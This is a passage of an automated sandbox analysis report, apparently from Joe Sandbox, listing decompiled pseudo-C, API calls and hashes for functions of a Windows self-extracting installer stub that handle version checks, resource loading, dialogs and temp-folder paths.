                                                                                                                                                                                                        • Opcode Fuzzy Hash: 36974e4effcdfd2f305b285f8be0da25b44b1ed98814157bc0de30616f1749f7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E01F430A04108ABEB60EB64DC49FEE7378EB56314F60029DF985931C1DF75AE8ACB51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				char* _v12;
                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                        				int _v28;
                                                                                                                                                                                                        				int _v32;
                                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                                        				int _v40;
                                                                                                                                                                                                        				void* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                                                        				long _t68;
                                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                                        				intOrPtr _t93;
                                                                                                                                                                                                        				intOrPtr _t97;
                                                                                                                                                                                                        				intOrPtr _t99;
                                                                                                                                                                                                        				int _t101;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                                                        				_t99 = __ecx;
                                                                                                                                                                                                        				_t106 = 0;
                                                                                                                                                                                                        				_v16 = __ecx;
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				_t103 = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_t106 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t62 = 0;
                                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                        						if(E000C2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                        						_v28 = _t68;
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_t99 = _v16;
                                                                                                                                                                                                        							_t70 = _v8 + _t99;
                                                                                                                                                                                                        							_t93 = _v24;
                                                                                                                                                                                                        							_t87 = _v20;
                                                                                                                                                                                                        							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                        								goto L18;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                        							if(_t103 != 0) {
                                                                                                                                                                                                        								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                        								_v36 = _t73;
                                                                                                                                                                                                        								if(_t73 != 0) {
                                                                                                                                                                                                        									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                        										L15:
                                                                                                                                                                                                        										GlobalUnlock(_t103);
                                                                                                                                                                                                        										_t99 = _v16;
                                                                                                                                                                                                        										L18:
                                                                                                                                                                                                        										_t87 = _t87 + 1;
                                                                                                                                                                                                        										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                        										_v20 = _t87;
                                                                                                                                                                                                        										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                        										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                        											continue;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L19;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t79 = _v44;
                                                                                                                                                                                                        										_t88 = _t106;
                                                                                                                                                                                                        										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                        										_t101 = _v28;
                                                                                                                                                                                                        										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                        										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                        										_t97 = _v48;
                                                                                                                                                                                                        										_v36 = _t83;
                                                                                                                                                                                                        										_t109 = _t83;
                                                                                                                                                                                                        										do {
                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E000C2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E000C2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                        											_t109 = _t109 + 0x18;
                                                                                                                                                                                                        											_t88 = _t88 + 4;
                                                                                                                                                                                                        										} while (_t88 < 8);
                                                                                                                                                                                                        										_t87 = _v20;
                                                                                                                                                                                                        										_t106 = 0;
                                                                                                                                                                                                        										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                        											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                        												GlobalUnlock(_t103);
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												goto L15;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L15;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L20:
                                                                                                                                                                                                        				 *_a8 = _t87;
                                                                                                                                                                                                        				if(_t103 != 0) {
                                                                                                                                                                                                        					GlobalFree(_t103);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t106;
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        0x000c2a65
                                                                                                                                                                                                        0x000c2a68
                                                                                                                                                                                                        0x000c2a6c
                                                                                                                                                                                                        0x000c2a6f
                                                                                                                                                                                                        0x000c2a6f
                                                                                                                                                                                                        0x000c2a7d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalFree.KERNEL32 ref: 000C2A6F
                                                                                                                                                                                                          • Part of subcall function 000C2773: CharUpperA.USER32(374600BF,00000000,00000000,00000000), ref: 000C27A8
                                                                                                                                                                                                          • Part of subcall function 000C2773: CharNextA.USER32(0000054D), ref: 000C27B5
                                                                                                                                                                                                          • Part of subcall function 000C2773: CharNextA.USER32(00000000), ref: 000C27BC
                                                                                                                                                                                                          • Part of subcall function 000C2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000C2829
                                                                                                                                                                                                          • Part of subcall function 000C2773: RegQueryValueExA.ADVAPI32(?,000C1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000C2852
                                                                                                                                                                                                          • Part of subcall function 000C2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000C2870
                                                                                                                                                                                                          • Part of subcall function 000C2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000C28A0
                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,000C3938,?,?,?,?,-00000005), ref: 000C2958
                                                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 000C2969
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,000C3938,?,?,?,?,-00000005,?), ref: 000C2A21
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 000C2A81
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3949799724-0
                                                                                                                                                                                                        • Opcode ID: 8fdd70561b634782757cdce497dfd13eecdd5172e35ebc487108a28af654e00f
                                                                                                                                                                                                        • Instruction ID: 3c5543a25f3ff4886c5e23bd59ece5988ee675ca8219597c47caca49d23b65e3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8fdd70561b634782757cdce497dfd13eecdd5172e35ebc487108a28af654e00f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96513631E00219EBDB21CF99C884EAEBBB5FF48714F14412EE905E3651DB359A41DBA2
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 32%
                                                                                                                                                                                                        			E000C4169(void* __eflags) {
                                                                                                                                                                                                        				int _t18;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = E000C468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                        				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                        				if(_t21 != 0) {
                                                                                                                                                                                                        					if(E000C468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                        						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							return LocalFree(_t21);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(0x40);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t21);
                                                                                                                                                                                                        						_t18 = 0x3e9;
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						E000C44B9(0, _t18);
                                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_t18 = 0x4b1;
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46A0
                                                                                                                                                                                                          • Part of subcall function 000C468F: SizeofResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46A9
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46C3
                                                                                                                                                                                                          • Part of subcall function 000C468F: LoadResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46CC
                                                                                                                                                                                                          • Part of subcall function 000C468F: LockResource.KERNEL32(00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46D3
                                                                                                                                                                                                          • Part of subcall function 000C468F: memcpy_s.MSVCRT ref: 000C46E5
                                                                                                                                                                                                          • Part of subcall function 000C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,000C30B4), ref: 000C4189
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,000C30B4), ref: 000C41E7
                                                                                                                                                                                                          • Part of subcall function 000C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000C4518
                                                                                                                                                                                                          • Part of subcall function 000C44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000C4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$FINISHMSG
                                                                                                                                                                                                        • API String ID: 3507850446-3091758298
                                                                                                                                                                                                        • Opcode ID: c7cf111fd10822195fd2d5ab878bc82d7c3d4cadf38e99c6e9dc9d97ea964795
                                                                                                                                                                                                        • Instruction ID: fc5038ccda5e91eb49ea14d2067cd1c112bc01bd9c45b8704fb1413853753c12
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7cf111fd10822195fd2d5ab878bc82d7c3d4cadf38e99c6e9dc9d97ea964795
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4201ADB57002183BF32417658CA6FBF658EEBD6799F14402DBB46E11819A68CC0141B5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C7155() {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct _FILETIME _v16;
                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                        				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                        				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                        				_t23 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                        					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                        					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                        					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                        					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                        					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                        					_t39 = _t36;
                                                                                                                                                                                                        					if(_t36 == 0xbb40e64e || ( *0xc8004 & 0xffff0000) == 0) {
                                                                                                                                                                                                        						_t36 = 0xbb40e64f;
                                                                                                                                                                                                        						_t39 = 0xbb40e64f;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xc8004 = _t39;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t37 =  !_t36;
                                                                                                                                                                                                        				 *0xc8008 = _t37;
                                                                                                                                                                                                        				return _t37;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 000C7182
                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 000C7191
                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 000C719A
                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 000C71A3
                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 000C71B8
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1445889803-0
                                                                                                                                                                                                        • Opcode ID: c6611cde17f80fc594a2ccf95bbf3df20aae8b3b300136bcd0aabda3a09ac779
                                                                                                                                                                                                        • Instruction ID: e1df537e95147315a233b3733f9e93fc79eac5130b73b93a5b17d95cb2e204ee
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c6611cde17f80fc594a2ccf95bbf3df20aae8b3b300136bcd0aabda3a09ac779
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84113A71E01208DFDB50DFB8DA48E9EB7F4EF18314F654859E805E7210EB389A048F45
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E000C19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v520;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t27 = __ebx;
                                                                                                                                                                                                        				_t11 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                        				_t34 = _a4;
                                                                                                                                                                                                        				_t14 = _a8 - 0x110;
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					_t32 = GetDesktopWindow();
                                                                                                                                                                                                        					E000C43D0(_t34, _t15);
                                                                                                                                                                                                        					_v520 = 0;
                                                                                                                                                                                                        					LoadStringA( *0xc9a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                        					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                        					MessageBeep(0xffffffff);
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if(_t14 != 1) {
                                                                                                                                                                                                        						L4:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t32 = _a12;
                                                                                                                                                                                                        						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							EndDialog(_t34, _t32);
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							_t23 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        0x000c1a72
                                                                                                                                                                                                        0x000c1a14
                                                                                                                                                                                                        0x000c1a06
                                                                                                                                                                                                        0x000c1a81

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 000C1A18
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 000C1A24
                                                                                                                                                                                                        • LoadStringA.USER32(?,?,00000200), ref: 000C1A4F
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 000C1A62
                                                                                                                                                                                                        • MessageBeep.USER32(000000FF), ref: 000C1A6A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1273765764-0
                                                                                                                                                                                                        • Opcode ID: ddb11c4f8bb384c3813959aa4e7ec5e071922ce6c9df2569e55df2a7f387cd17
                                                                                                                                                                                                        • Instruction ID: 76e48f62e141d49b203657656f6bb2bfbb88f2aa4c93775fd594d24299e966bb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ddb11c4f8bb384c3813959aa4e7ec5e071922ce6c9df2569e55df2a7f387cd17
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F11A13160110DAFEB10EF68DD08FEE77B8FF4A314F108158F91692192DA349E01CB96
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C47E0(intOrPtr* __ecx) {
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				intOrPtr _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                                                        				void _t24;
                                                                                                                                                                                                        				struct HWND__* _t25;
                                                                                                                                                                                                        				struct HWND__* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				intOrPtr* _t28;
                                                                                                                                                                                                        				intOrPtr* _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                        				if(_t34 != 0) {
                                                                                                                                                                                                        					_t22 = _t33;
                                                                                                                                                                                                        					_t27 = _t22 + 1;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t6 =  *_t22;
                                                                                                                                                                                                        						_t22 = _t22 + 1;
                                                                                                                                                                                                        					} while (_t6 != 0);
                                                                                                                                                                                                        					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                        					 *_t34 = _t24;
                                                                                                                                                                                                        					if(_t24 != 0) {
                                                                                                                                                                                                        						_t28 = _t33;
                                                                                                                                                                                                        						_t19 = _t28 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t9 =  *_t28;
                                                                                                                                                                                                        							_t28 = _t28 + 1;
                                                                                                                                                                                                        						} while (_t9 != 0);
                                                                                                                                                                                                        						E000C1680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                        						_t11 =  *0xc91e0; // 0x27a8eb8
                                                                                                                                                                                                        						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                        						 *0xc91e0 = _t34;
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t25 =  *0xc8584; // 0x0
                                                                                                                                                                                                        					E000C44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					LocalFree(_t34);
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 =  *0xc8584; // 0x0
                                                                                                                                                                                                        				E000C44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}
















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,000C4E6F), ref: 000C47EA
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 000C4823
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 000C4847
                                                                                                                                                                                                          • Part of subcall function 000C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000C4518
                                                                                                                                                                                                          • Part of subcall function 000C44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000C4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 000C4851
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                        • API String ID: 359063898-3647970563
                                                                                                                                                                                                        • Opcode ID: 6776185531d840b5af51d9cb5aca3b75fedc930714a7015f30cf3cd9da010167
                                                                                                                                                                                                        • Instruction ID: 2f3f92f85bbfa142b66e48e65f2ff3ad35719d019316cdd955ee193814854c8e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6776185531d840b5af51d9cb5aca3b75fedc930714a7015f30cf3cd9da010167
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E411C675604641AFE7659F249C28FBF3B9AFBC5350B14851DFD8297281DE39CC0A8760
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E000C6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                        				struct HRSRC__* _t6;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				struct HINSTANCE__* _t23;
                                                                                                                                                                                                        				int _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t23 =  *0xc9a3c; // 0xc0000
                                                                                                                                                                                                        				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                        				if(_t6 == 0) {
